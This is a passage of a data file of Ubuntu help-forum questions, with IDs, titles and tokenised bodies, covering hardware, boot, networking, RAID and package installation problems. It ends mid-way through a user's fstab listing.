346264	does the version of opencv shipped with 12.04 support v4l2 ?	how can i tell whether or not the version of opencv shipped with ubuntu 12.04 supports v4l2 devices ? i have found a number of ( oldish ) pages that say opencv does support v4l2 , but it 's not clear to me whether the version installed on my 12.04 box was compiled with the appropriate option to enable this . needless to say , i 'm having difficulty capturing images from a v4l2 camera using the python bindings for opencv . i 'm trying to figure out where things are falling apart .
346266	ca n't use printer in ubuntu-12.04	i have a hp deskjet 2515 all-in-one printer.i have installed it properly in ubuntu 12.04 and it shows it as my local printer and also default printer.the problem is whenever i give it the print command it schedules the job , processes it and then shows the message - `` idle-rendering complete '' .i have tried printing a test page both from cups as well as from the printer 's front end but to no avail.any ideas as to where i am going wrong ?
346267	can ubuntu 12.04 be run in p4 compaq ?	can i run ubuntu 12.04 on p4 3.06 ghz . i am currently using windows 7 with no aero features . i have no graphics card and a 16 mb video card .
346268	usb persistent + live boot	i would like to install ubuntu on my 128 gb with persistent data . if possible i would like to boot it within virtual box so i can access it from any windows computer . is it possible ?
346273	xclip inside virtualbox vm does n't work	i 'm trying to use xclip inside an ubuntu server virtual machine . i get the following error : ~ # echo 'test ' | xclip error : ca n't open display : ( null ) i 'm having the same issue with xsel : ~ # xsel -- clipboard < test.txt xsel : ca n't open display : ( null ) : inappropriate ioctl for device i have n't configured virtualbox display , although i noticed that i can use remote display . would this help ? is there another way to copy fairly large text files to clipboard from inside a virtual machine ?
346276	juju error : hook failed : `` config-changed ''	i am deploying ha ha cluster for keystone , cluter is up and both units are showing agent state `` started '' but one unit is showing error as `` error : hook failed : `` config-changed '' i sshed to that unit and chekec keystone logs also there are no errors , and config also looks ok , so whats the error here ? i mean how i am suppose to troubleshoot it ? here is output of juju status , keystone : charm : local : precise/keystone-223 exposed : false relations : cluster : - keystone ha : - keystone-hacluster identity-service : - cinder - glance - nova-cloud-controller shared-db : - mysql units : keystone/0 : agent-state : error agent-state-info : 'hook failed : `` config-changed '' ' agent-version : 1.12.0 machine : `` 12 '' public-address : opks02.master subordinates : keystone-hacluster/1 : agent-state : started agent-version : 1.12.0 public-address : opks02.master keystone/1 : agent-state : started agent-version : 1.12.0 machine : `` 13 '' public-address : opks01.master subordinates : keystone-hacluster/0 : agent-state : started agent-version : 1.12.0 public-address : opks01.master keystone-hacluster : charm : local : precise/hacluster-67 exposed : false relations : ha : - keystone hanode : - keystone-hacluster subordinate-to : - keystone
346278	really need g77 on ubuntu 12.04 , ca n't install	i am running an extensive code that i requires g77 to compile . ( yes i could probably debug for gfortran but it took me months just to get it working so i really really do n't want to ) . i have tried http : //astrokode.wordpress.com/2012/10/31/installing-g77-compiler but i get this error when i try to install : reading package lists ... done building dependency tree reading state information ... done package g77 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'g77 ' has no installation candidate i have seen on forums that people are installing the g77 for ubuntu 8.04 , but i am fairly new to ubuntu and unclear of exactly how to do this .
346284	can i play metin2 on ubuntu ?	i want to know if the game metin2 can be played on ubuntu because i want to get rid of windows wich i use only for this game .
346285	is it possible to add an option to the context menu in nautilus to open media in an existing vlc instance ?	i 've unchecked vlc 's option - 'only allow one instance ' , since it would help simultaneous playbacks . but sometimes it is desirable to just open a new file in the already running one . is it possible to append a script in nautilus ( i do n't know how ) that will open the file in the already running vlc , instead of changing vlc preference or dragging and dropping methods ? edit : you guys might already know this , but i just found out that we could put bash scripts at `` /home/.gnome2/nautilus-scripts '' either in folders or not ( to group them ) . so it 's just a matter of finding out the running pid of vlc and force the file to open in it . i do n't know bash scripting but if you do , please help me out here .
346287	is it necessary to change hostname following cloning to multiple machines ?	i am cloning multiple laptops in a school environment with edubuntu 12.04 . there are some network issues that have resulted with machines not connecting to the wireless . there are 130 machines in all that i have deployed . i have n't changed the hostname . would that resolve the network issues ?
346290	how to download and install jubler on ubuntu 13.04 ?	i ca n't find a suitable version of jubler ( subtitle editor ) for ubuntu 13.04 and smplayer also .
346292	i can not remove items from my panel	i just can not remove items from my top panel . i see the option to remove it , but its slighty darker than the other options . so its unavailible to remove it for me . i use a 12.10 ubuntu lts system ( 32-bits )
346293	ubuntu 13 boot cd wo n't load from bios	i 'm running a dell i15rv-477blk laptop with windows 7 home premium , and i 'm trying to dual-boot linux based on the joyous experience i had with my previous laptop . however , i 've hit some problems . i 've burned the files from the ubuntu 13 iso onto a live dvd because the live cd was too small . after burning this disk , i rebooted my computer and hit f12 , attempting to boot from the dvd/cd drive . however , it skipped over the boot . in fact , it merely jumped right from a short pause on a black screen to the starting windows logo . i ran the wubi.exe file from the dvd when my desktop loaded and selected `` help me to boot from cd '' . at the end of the installation , it merely stated that the installation had hit an error and could not install . upon checking the log file , i found this : 09-16 11:38 error windowsbackend : error executing command > > command=c : \users\samuel\appdata\local\temp\pyl7261.tmp\bin\7z.exe 1 c : \ubuntu\install\installation.iso > > retval=2 > > stderr= 7-zip 9.20 copyright ( c ) 1999-2010 igor pavlov 2010-11-18 error : c : \ubuntu\install\installation.iso : can not open file as archive errors : 1 > > stdout= traceback ( most recent call last ) : file `` \lib\wubi\backends\win32\backend.py '' , line 519 , in get_iso_file_names file `` \lib\wubi\backends\common\utils.py '' , line 66 , in run_command exception : error executing command > > command=c : \users\samuel\appdata\local\temp\pyl7261.tmp\bin\7z.exe l c : \ubuntu\install\installation.iso > > retval=2 > > stderr= 7-zip 9.20 copyright ( c ) 1999-2010 igor pavlov 2010-11-18 error : c : \ubuntu\install\installation.iso : can not open file as archive errors : 1 > > stdout= 09-16 11:38 debug windowsbackend : command > > c : \users\samuel\appdata\local\temp\pyl7261.tmp\bin\7z.exe l c : \ubuntu\install\installation.iso 09-16 11:38 debug distro : does not contain casper\filesystem.squashfs 09-16 11:38 debug tasklist : # # # finished check_iso 09-16 11:38 debug tasklist : # # finished use_cd 09-16 11:38 debug tasklist : # # running extract_kernel ... 09-16 11:38 error tasklist : could not retrieve the required installation files traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 618 , in extract_kernel exception : could not retrieve the required installation files 09-16 11:38 debug tasklist : # cancelling tasklist 09-16 11:38 error root : could not retrieve the required installation files traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 130 , in select_task file `` \lib\wubi\application.py '' , line 205 , in run_cd_menu file `` \lib\wubi\application.py '' , line 122 , in select_task file `` \lib\wubi\application.py '' , line 228 , in run_cd_boot file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 618 , in extract_kernel exception : could not retrieve the required installation files i personally only know that i associated winrar with iso files , attempting to make extractions easier . after taking off this association , thinking that it was winrar causing the installation.iso to be read as an archive , i ran wubi.exe again . the same thing happened , with the same error listed in the same log file . as a last effort , i also hit f2 upon boot in order to rearrange the boot priorities , placing the cd/dvd drive first . once more , the computer skipped over the boot disc and immediately started up the windows 7 os . i do n't know what else to do .
346294	lost/reset password	trying to reset password . at root @ ubuntu : ~ # , i enter passwd username and press enter . i then get enter new unix password : . at this point i can not use the keyboard to enter anything . if i press enter i get retype new unix password . again the only key that works is the enter key . how do i reset my forgotten password ?
346298	jre installation using webupd8 ppa , possible ? how does it harm if i use jdk when jre is enough for me ?	could i install only jre using webupd8 ppa . i think this ppa provides jdk . but i just need jre . how does it harm if i use jdk when jre is enough for my webserver ? another thing if i install a package using a ppa or apt-get install utility would i automatically be receiving updates/ upcomning releases whenever i do apt-get update & & apt-get upgrade ?
346299	sqlplus on ubuntu 12.04	i 'm tryin to install sqplplus on my ubuntu machine , but it did n't really work well till now.. i 've did everything in this article.. and tried `` sqlplus '' and gave me this error.. sqlplus : error while loading shared libraries : libsqlplus.so : can not open shared object file : no such file or directory i 've read that that the oracle_home variable could make this error so by env | grep orac but its not set .. tried to set it but i needed the oracle_base var but its also not set.. this link says that the oracle_base should have the value of /oracle/app , but i ca n't find a diectory called /oracle in my root folder.. trying $ whereis sqlplus sqlplus : /usr/bin/sqlplus /usr/bin/x11/sqlplus $ which sqlplus /usr/bin/sqlplus btw i visited this link but it still not working.. what should i do now ?
346302	where is the usage of ubuntu cloud guest image on openstack documented ?	whenever i set up a devstack or openstack deployment , i want to add the latest lts ubuntu server image . i succeeded several times in the past and i believe it can be achieved with something like : wget http : //uec-images.ubuntu.com/releases/12.04.2/release/ubuntu-12.04.2-server-cloudimg-amd64-disk1.img glance image-create -- is-public true -- disk-format qcow2 -- container-format bare -- name `` precise '' < ubuntu-12.04.2-server-cloudimg-amd64-disk1.img i wonder , though , where can i find the officially supported documentation on doing this ? how can i contribute to it ? i sometimes experience problems and without official instructions i 'm never sure if it 's the above command or my deployment . i tried adding these instructions to the openstack official docs and/or the accompanying disqus comments on two occasions , but these would get removed and i ca n't find a consistent , supported manual to do this , i would expect very basic , procedure . also , what about the elusive cloud-init options to guest images ? where can i find instructions on how to use those ? from the terminal and from the web ui ? i once had to go fishing for this information in the source code . what i found so far is the site listing the available images , but one that does n't state what are the formats of the images - i always have to google for this information . there is the uec wiki that lists many recipes on how to create your own images , but not how to use existing ones ( or the premade ubuntu cloud images ) . then there is the most easily found `` cloud '' category on ubuntu.com that only links to some promotional pamphlets and the uninformative cloud images listing . i know that this is a semi-bug report ( which i would like to see fixed or help fix : ) ) , but i would also like to know the answers to the questions i posed .
346303	how to determine which is your touchscreen driver	so many unrecognized options come up when typing the command lsusb , but how do we determine which one is actually for our specific touchscreen ? thanks . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 003 device 002 : id 0eef:790a d-wav scientific co. , ltd bus 001 device 003 : id 147e:2020 upek bus 001 device 004 : id 0a5c:21e6 broadcom corp . bus 001 device 005 : id 04f2 : b315 chicony electronics co. , ltd
346307	how to start eclipse kepler using apache ?	i have installed my apache2 and eclipse kepler . but there is no options for starting server in eclipse ?
346308	how to force two users to autologin at boot into two separate xfce sessions ?	on boot , i would like more than one user to be auto logged in on virtual terminals .
346310	upgrade to latest tomcat/ jre or stick with what 's provided by lts ?	running a production web server with ubuntu 12.04 which ships tomcat 7.0.26 . should i care about updating the tomcat installation to latest 7.0.42 version or should i stick with what 's provided ? if i stick then am i not vulnerable to threats & bugs in 7.0.26 version ? i 've been suggested to always use the latest minor version for things like jre 7 , tomcat 7 etc , does it not hold good here ? should i be installing the latest version by downloading the tar & untar-ing it instead of using apt-get install to download from ubuntu repositories an older version ? how would i be updating those installations later then ? edit : i just have single webapp running on a single server . while i do n't have any specific feature requirements for tomcat or jre that force me to use a particular newer version . i 'm asking this just to ensure that if i 'm running an older version supplied by ubuntu ( installed from through apt-get install ) , am i safe in terms of security & quality of software ? do these software packages will be updated to a newer minor version later while i m sticking to a particular lts version ?
346312	running short-term tasks via upstart	os : ubuntu 12.04 task : run script at certain start/stop conditions . no long-running service/daemon is launched , only short-term actions . upstart script test.conf : description `` test script '' start on local-filesystems or runlevel [ 2345 ] stop on runlevel [ ! 2345 ] task pre-start exec /full/path/to/script.sh start pre-stop exec /full/path/to/script.sh stop problems : running 'start test ' never ends . if i ctrl-c hanged upstart , furtehr 'status ' calls show the service is running . ' 'stop test ' does n't result in running 'pre-stop ' stanza at all . is the original task solvable using upstart scripts ? thanks . update . `` the fact that your script.sh has both start and stop actions , which does suggest a long-running daemon '' no contradiction . there 's startup action and cleanup action , without long-running process ( es ) in between . when i add 'exec ' stanza , i.e . exec /full/path/to/script.sh idle the result is this : $ start test test stop/waiting $ status test test stop/waiting $ stop test stop : unknown instance : correction : the script mentioned in stanzas is executed with 'start ' and 'idle ' parameters , but not with 'stop ' .
346314	enable touchscreen with egalax capacitive on ubuntu	how do you enable the touchscreen on ubuntu 12.04 with a egalax capacitive driver ? also , how do i know if i have my driver already ? ( it did appear when running the lsusb command . ) thanks ! note : i install utouch , relogged , but nothing changed .
346315	usb-stick with ubuntu iso image does not boot in efi notebook	i created an usb-stick with the 64-bit 12.04.3 iso image using several methods , both on linux and on windows , using dd , unetbootin and universal usb installer . my new uefi notebook ( asus f550v , intel core-i5 ) has secure boot turned off ( there already is an debian wheezy installed successfully ) . after rebooting and selecting the ubuntu-selection ( that does show in the efi boot-menu ) it always ends with a grub rescue message : error file : /boot/grub/x86_64-efi/normal.mod not found . it does not matter whether the compatibility mode csm is enabled or not . what am i doing wrong ? when i mount the partition ( s ) from the usb-stick i see that mentioned file indeed is not there . it does not matter if i put the normal.mod file from my wheezy install there . hopefully somebody can give me a pointer .
346317	how can i fix `` operating system was not found '' error ?	a few days ago , i installed some updates for my ubuntu . afterwards , i wanted to restart it but it told me that the operating system was not found . then , i downloaded ubuntu 13.04 ... .and i could delete the old version and install the new one . but as soon as i take out the stick , it will show me the messages again : operating system not found . i have alredy deleted the old operating system . do i have to do something in the bios ? it is a lenovo laptop . what can i do ?
346320	mouse click beep	is there any way to get ubuntu to beep whenever i press a mouse button . i want to do this because many times i 'feel ' the mouse button clicking , but it does n't seem to register .
346321	installing ubuntu from usb stick on mac - black screen	i am trying to install ubuntu again on a macbook pro ( 5.2 ) on which i had ubuntu running about a year and a half or so ago . since then i have removed my dvd drive and replaced it with a second internal hd . i am therefore to install from usb stick . i tried a number of iso 's from ubuntu and kubuntu to no avail . imho this one : kubuntu-12.04-alternate-amd64+mac : should boot . i got refind install and can boot from the stick i create following http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-mac-osx however booting just results in a black screen and i can not even change to different kernel parameters for the boot or whatever . i know that the usb stick creation works since i can actually create a fedora 19 iso that will boot that way and fail later on . however no luck with ubuntu , which is what i would like to use . so is there some specific iso that i should try or some other trick i can use to get ubuntu running again ?
346322	network restart cleared my routing table help	i 'm trying to set up a client and server vm to access the internet through a gateway vm , and i tried to change my server to allow ip forwarding and i was told to restart the network . i did , but now my routing table clear all the routes in it and i can not add routes any more using 'route add ' . any help or just an explanation of what happened would be greatly appreciated . the following link is a screen grab of the blank routing table and the inability to use route add . thank you so much !
346323	ubuntu 10.04 to 13.04	i have a system running on ubuntu 10.04 and wants to upgrade to 13.04 but i can not the install halts and i can never start the install . is there any way for me to tell what is stopping the install . or a way to make the install work ? rich
346324	why my ubuntu 13.04 is booting so slow and fails many time ?	i am relatively new to ubuntu and linux . i installed ubuntu 13.04 on my dell inspiron 15r special edition , it runs fine.except that it boots very slow . sometimes gets stuck at the ubuntu logo with dots . sometimes it gets me to login but touch pad does n't work . please guide me . system config : efi based boot . intel core i5 3210m 1tb hdd amd radeon 7750m here 's my boot chart : http : //s24.postimg.org/5ocbq7wh1/prateekpc_raring_20130916_12.png
346325	ubuntu 12.04 lts shuts down without notice	i have a lenovo thinkpad w500 w/4gb of memory . os is a dual-boot windows 7 ultimate and ubuntu 12.04 lts . i changed the power settings to keep the laptop `` on '' so i do n't believe that it 's a power savings issue . it shuts down when the machine is inactive or during installation of packages -- the latest while installing `` wine '' .
346327	how can shared memory be dangerous in server environments & how to secure it ?	i just understand somewhat about what 's the purpose of shared memory which is for faster exchange or use of data among several programs . but having seen a lot of people trying to or talking about secure it , i dont understand how it could be dangerous & what could be done to secure it ? i am asking this in context of configuring a server environment on a vps .
346330	how to apply theme ?	i 'm trying to apply the following theme : http : //gnome-look.org/content/show.php/h4k3r ? content=156969 i have a .themes folder in `` home '' folder but ubuntu tweak tool wo n't detect it . running 13.04
346331	i installed ubuntu and it says an error occured	i installed ubuntu on my windows 8 , and during half of the installation it stopped saying an error occurred that was ; ioerror : what do i do ? help please
346332	system requirements for 13.04	i am having dell studio 1458 with intel core i5 processor @ 2.27 ghz and 4gb ram with 320 gb hard disk space.weather it is enough for latest ubuntu .
346333	`` operation system not found '' when installing 13.04	i am attempting to install 13.04 on a dell xps 15 ( l502x ) , onto an intel ssd . i have run shred to wipe the contents of the ssd , so i should be starting from a clean slate , and my objective is for ubuntu to use the entire drive . note , though , that i had an older ubuntu installation on this ssd prior to running shred . however , from both a amd64 dvd and an amd64 boot usb key ( created using startup disk creator from the downloaded iso ) , i get `` operation system not found '' when i attempt to boot . if i try booting from something else ( e.g. , an old sysrescue linux mini-cd ) , it boots fine , so the issue is not that the l502x can not boot from external media . i even double-checked that the mbr on the ssd was wiped by using dd . still no luck . any suggestions ? ( and to those editing the title , no this is not a typo in my question ) thanks ! update : replacing the ssd with another hard drive ( one with windows 7 on it ) allows the usb key to boot . hence , the problem is with the ssd . the ssd itself seems fine -- sysrescue linux sees it . however , there 's something on it that is preventing the ubuntu 13.04 live dvd/usb from booting , for some reason .
346335	how to set/change resolution to '1280 x 1024 ' on 12.0 or 13.04 ?	i installed ubuntu 12.04 and 13.04 on a dell vostro 200 . on both , my resolution is/was set at '1024 x 768 ' . the only other offering under settings is '800 x 600 ' . everything on the screen is too big , the resolution is too low . on winxp/win7/win8 my setting are 1280 x 1024 , which is perfect . how can i get my dell vostro 200 ubuntu 12.04 to set the resolution to 1280 x 1024 ? on some posts there is the reference to a folder ... /etc/gdm and running run -xrandr . i tried copying and pasting -xrandr strings from other posts , they did not work , and i discover that i do n't have the folder ./etc/gdm on either the ubuntu 12.04 or 13.04 instalation . i am only a user of the software , i have no understanding of the mechanics of ubuntu or windows . the solution needs to be straigtforward , simple , even 'child-proof ' , any help will be appreciated .
346336	problems with ubuntu 13.04 and server log in	we have a debian server and we have problems to connect ubuntu 13.04 with the server . is there any easy way to connect the ( proxmox ) server with ubuntu 13.04 machines and make the user log in easy ? many thanks in advance ,
346338	bcm4311 wireless - works with b43 modprobe then stops - advice	i 've been at whit 's ends for over 4 months with this issue on my hp-550 laptop . finally after 2 more hours today , found this solution ( 09/2013 ) , but it does n't appear to 'remember ' once i reboot . not sure how to fix it now as i 've spent hours reading online . once i `` term '' the below , my wireless top right bar comes alive in 13.04 and connects to my network ; once i reboot/turn off , i lose it and have to go back into term and do the b43 modprobe again , a pain . now i would like a really simple quick solution to the b43 modprobe solution as listed below website : http : //linuxg.net/how-to-fix-broadcom-bcm4311-wireless-driver-on-ubuntu-and-linux-mint/ : this is what they said : remove the default driver : $ sudo apt-get remove -- purge bcmwl-kernel-source install a the linux firmware nonfree drivers : $ sudo apt-get install linux-firmware-nonfree load the b43 module : $ sudo modprobe b43 to make it work automatically , do : $ sudo su cho `` b43 '' > > /etc/modules help most welcome . thanks .
346339	maas with external dhcp tftp time out	i 'm trying to get maas up and running , and i 've installed the control node without maas-dhcp or maas-dns since i already have another dhcp server . i 've set up the next-server attribute in my dhcp config to point to the maas control node , and the filename to `` pxelinux.0 '' . the setup is working with another tftp controller ( foreman ) . when i pxe boot a client to try and enlist it in maas , it sees the dhcp server and gets the maas controller address , but times out looking for a tftp server . i 've checked mass-pserv logs and it does n't show any attempted connections . i 've also attempted to connect from another machine with tftp connect *maas-address* but it gives me a unknown host error . i think the mass tftp server is not accepting connections or not running , but i 'm not sure why . does maas-dhcp and maas-dns need to be installed for python twisted tftp to work ?
346344	trying to install linux on asus ux50v , computer stuck on `` checking battery status ... ''	i have an asus ux50v laptop , and i do n't have a battery for it . when i reboot , it states that my graphics driver is n't supported and i can start in low graphics mode . when i do this , it just hangs on `` checking battery status ... '' . i think this is either : an issued with the drivers . i need to install some kind of drivers being that i have hybrid sli . an issue not having a battery in the laptop . any suggestions ? what drivers/how do i install them for this video card ?
346345	what is the meaning of exp9ubuntu1 suffix in ubuntu ?	here is my clang version : ubuntu clang version 3.2-1~exp9ubuntu1 ( tags/release_32/final ) ( based on llvm 3.2 ) and what i do n't know is the meaning of `` exp9ubuntu1 '' ? please help , thanks .
346346	in awesome desktop , is there some animation available e.g . slide when transition to next workspace ?	transparency working fine with awesome desktop and xcompmgr .
346351	cpu fan running aggresively after wake up from suspend	i recently install ubuntu 13.04 on my hp compaq 6720s . iâm not sure whatâs wrong with it , when i resume from suspend usually on windows pc the fan speed is usually highest for the first 2 minutes or so and then slows down after a while . with ubuntu my cpu fan speed does n't change , when i resume my pc from suspend its always high . i checked the load on the load on the processors its usually 4-5 % . it only occurs when awaking from suspend but when rebooting everything functions as normal . how to fix it ?
346354	xubuntu - manually restart network after reboot ?	i am running xubuntu ( 12.04 lts ) and something is wrong with my network settings ( for wireless network using dhcp and wpa ) . whenever i reboot , after the access to the network is not working unless i restart the network or at least the wlan0 interface : sudo ifdown wlan0 sudo ifup wlan0 the configuration in /etc/network/interfaces seems to be correct , because when i restart networking it is working correctly . any ideas ? edit : in the panel the network manager shows the wireless networks as 'not managed ' , before and after restarting the network .
346355	connecting 2006 macbook to external display using displayport to hdmi cable	does n't do anything . anyone knows which codecs to download to get things working ? would be enormously appreciated ! running ubuntu 12.04 on macbook ( bought august 2006 ) is it at all possible ?
346356	bootable ubuntu install partition	i installed ubuntu on my dad 's laptop a year ago and i wanted to install another ubuntu based distro on his laptop . he has no cds or dvds so i thought about making partition that would pretty much be a copy of the install cd . i did the same thing on windows 7 and thanks to easybcd it was n't hard to pull off . so far i tried to create a 1 gig partition with the ext4 filesystem and extracted the contents of the iso onto that partition . do any of you guys know how i could make this work , or any alternative simple solutions ?
346357	my postinst script launches a service successfully but apt-get apparently shuts it down . why ?	i have this package with a postinst script that launches a service as its last step . something like : # ! /bin/sh set -e . /usr/share/debconf/confmodule [ ... ] case `` $ 1 '' in configure ) [ ... ] ldconfig echo `` install concluded '' echo `` starting service '' service lttng-sessiond restart echo `` postinst complete '' ; ; [ ... ] esac exit 0 when i run 'sudo apt-get install packagename ' , i get this piece of log : [ ... ] starting service stop : unknown instance : lttng-sessiond start/running , process 22914 postinst complete processing triggers for libc-bin ... ldconfig deferred processing now taking place the `` stop : unknown instance : '' is due to my using 'restart ' instead of 'start ' , no big deal . the important thing is that the service does start , as the log shows . but the system monitor reveals the service dies almost instantaneously ( it 's not a problem with the service itself , since issuing the service start command anew from the command line works just fine ) . i 'm grasping at straws at this point : could it be the `` libc-bin triggers '' or the `` ldconfig deferred processing '' that is shutting the service down ?
346358	dual booting issue with windows 8	i have installed ubuntu along side with my window 8 , after installation of ubuntu completed and when i click on restart , it does n't restart . when i manually shut down my pc and start it , it directly boots into windows 8 . i am relatively a beginner of ubuntu , so please help me solve this issue .
346361	why does n't wobbly windows in gnome work ?	i have ubuntu 13.04 with gnome 3.8 i have installed compiz , ccsm.. i`m activated wobbly windows on it but they doesnt work . it was very well works on ubuntu 10.10 with gnome why ?
346365	file permissions on apple hard drive	i am attempting to help some friends with their old macbook . the hard drive is n't boot worthy anymore but i can still use it on my hard drive dock . my friends want the 100 plus gb of images of there children off that hard drive . i 'm using ubuntu in a virtual box to gain access to the hard drive but when i try to access the folders it says access denied . i know the username and passwords for the apple . but what i do n't know is the commands in the terminal to unlock the files . ive done alot of research , i 've used chmod 777 to reset the file permissions to fully unlocked but that did n't work . any advice i could get on where to go next i would very much appreciate ! ! thanks ! !
346368	how install toggl desktop in ubuntu ?	how can install desktop toggl on ubuntu 13.04 ? i try type : sudo add-apt-repository ppa : official-toggl/ppa sudo apt-get update sudo apt-get install desktop-toggl but getting information desktop-toggl not found .
346371	currently using thunderbird with windows . can i use the same thunderbird after ubuntu install ( will remove windows ) ?	i 'm currently using thunderbird with win xp and 7 . i want to install ubuntu on both computers ( had enough of windows ) . question : will my current thunderbird ( that i am using with win ) work with ubuntu after i install it , or must i use a new thunderbird install ( i think it comes with ubuntu package - therefore i must configure all my email accounts and loss mail history ) ? i will take out win on both computers .
346376	one of two raid 1s is not recognized in ubuntu 13.04	i have a 256gb ssd ( ubuntu/win8 ) , and two 1tb drives in raid 1 . the problem is that i just recently added another two drives that are 4tb in raid 1 but they are n't detected in ubuntu as one drive but separate . i know it works because windows detected my new 4tb raid 1 just fine , here 's a screenshot via one of the raid disk utilities that came with my motherboard ( fakeraid ) . fdisk -l disk /dev/sda : 256.1 gb , 256060514304 bytes 255 heads , 63 sectors/track , 31130 cylinders , total 500118192 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0a7f44fd device boot start end blocks id system /dev/sda1 1 500118191 250059095+ ee gpt warning : gpt ( guid partition table ) detected on '/dev/sdb ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdb : 4000.8 gb , 4000787030016 bytes 255 heads , 63 sectors/track , 486401 cylinders , total 7814037168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 disk /dev/sdb does n't contain a valid partition table warning : gpt ( guid partition table ) detected on '/dev/sdc ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdc : 4000.8 gb , 4000787030016 bytes 255 heads , 63 sectors/track , 486401 cylinders , total 7814037168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 disk /dev/sdc does n't contain a valid partition table warning : gpt ( guid partition table ) detected on '/dev/sdd ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sdd : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sdd does n't contain a valid partition table warning : gpt ( guid partition table ) detected on '/dev/sde ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sde : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sde does n't contain a valid partition table warning : gpt ( guid partition table ) detected on '/dev/mapper/ddf1_teraraid ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/mapper/ddf1_teraraid : 1000.1 gb , 1000120999936 bytes 255 heads , 63 sectors/track , 121591 cylinders , total 1953361328 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/mapper/ddf1_teraraid1 1 1953361327 976680663+ ee gpt disk /dev/mapper/ddf1_teraraid1 : 134 mb , 134217728 bytes 255 heads , 63 sectors/track , 16 cylinders , total 262144 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000040 disk /dev/mapper/ddf1_teraraid1 does n't contain a valid partition table disk /dev/mapper/ddf1_teraraid2 : 998.9 gb , 998911246336 bytes 255 heads , 63 sectors/track , 121444 cylinders , total 1950998528 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x73736572 this does n't look like a partition table probably you selected the wrong device . device boot start end blocks id system /dev/mapper/ddf1_teraraid2p1 1920221984 3736432267 908105142 72 unknown /dev/mapper/ddf1_teraraid2p2 ? 1936028192 3889681299 976826554 6c unknown /dev/mapper/ddf1_teraraid2p3 ? 0 0 0 0 empty /dev/mapper/ddf1_teraraid2p4 27722122 27722568 223+ 0 empty disk /dev/mapper/ddf1_teraraid3 : 1073 mb , 1073741824 bytes 255 heads , 63 sectors/track , 130 cylinders , total 2097152 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/ddf1_teraraid3 does n't contain a valid partition table blkid /dev/sda1 : label= '' recovery '' uuid= '' 0ae412dfe412cd37 '' type= '' ntfs '' /dev/sda2 : uuid= '' 0613-84b4 '' type= '' vfat '' /dev/sda4 : uuid= '' 3a1214b712147a59 '' type= '' ntfs '' /dev/sda5 : uuid= '' dbb033df-b455-41c5-a050-d6aa816462a1 '' type= '' ext4 '' /dev/sda6 : uuid= '' 8577fdea-9aef-4789-b62e-86100019d2e1 '' type= '' swap '' /dev/sdd : type= '' ddf_raid_member '' /dev/sde : type= '' ddf_raid_member '' /dev/mapper/ddf1_teraraid2 : label= '' teraraid '' uuid= '' 202e91bf2e918e82 '' type= '' ntfs '' /dev/mapper/ddf1_teraraid3 : label= '' randomstuff '' uuid= '' 00eea61f-86f3-46fb-bd66-07da8355a2f4 '' type= '' ext4 '' my 4tb drives /dev/sdb and /dev/sdc should be recognized as ddf_raid_member but they 're nowhere to be found here ... blkid -p /dev/sdb this command gives no output dmraid -rvv /dev/sdb notice : /dev/sdb : asr discovering notice : /dev/sdb : ddf1 discovering notice : /dev/sdb : hpt37x discovering notice : /dev/sdb : hpt45x discovering notice : /dev/sdb : isw discovering notice : /dev/sdb : jmicron discovering notice : /dev/sdb : lsi discovering notice : /dev/sdb : nvidia discovering notice : /dev/sdb : pdc discovering notice : /dev/sdb : sil discovering notice : /dev/sdb : via discovering no raid disks and with names : `` /dev/sdb '' fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda5 during installation 